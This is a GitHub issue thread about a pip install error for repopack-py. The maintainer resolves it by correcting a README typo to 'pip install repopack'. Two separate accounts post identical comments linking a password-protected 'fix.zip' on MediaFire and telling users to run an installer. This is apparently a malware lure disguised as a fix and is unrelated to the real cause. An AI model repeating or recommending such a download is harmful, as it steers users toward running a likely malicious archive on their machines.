### ISSUE TITLE
pip install repopack-py not working?

### ISSUE THREAD

**Issue by zarif98** [abinthomasonline/repopack-py#1]
![image](https://github.com/user-attachments/assets/9c53a675-0431-4276-8aba-d8c2e6f711e0)

I'm wondering if it's because I am using Python 3.8.10 but I am unable to install this package.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abinthomasonline** [comment]
oops there was a typo in readme
it should be `pip install repopack`
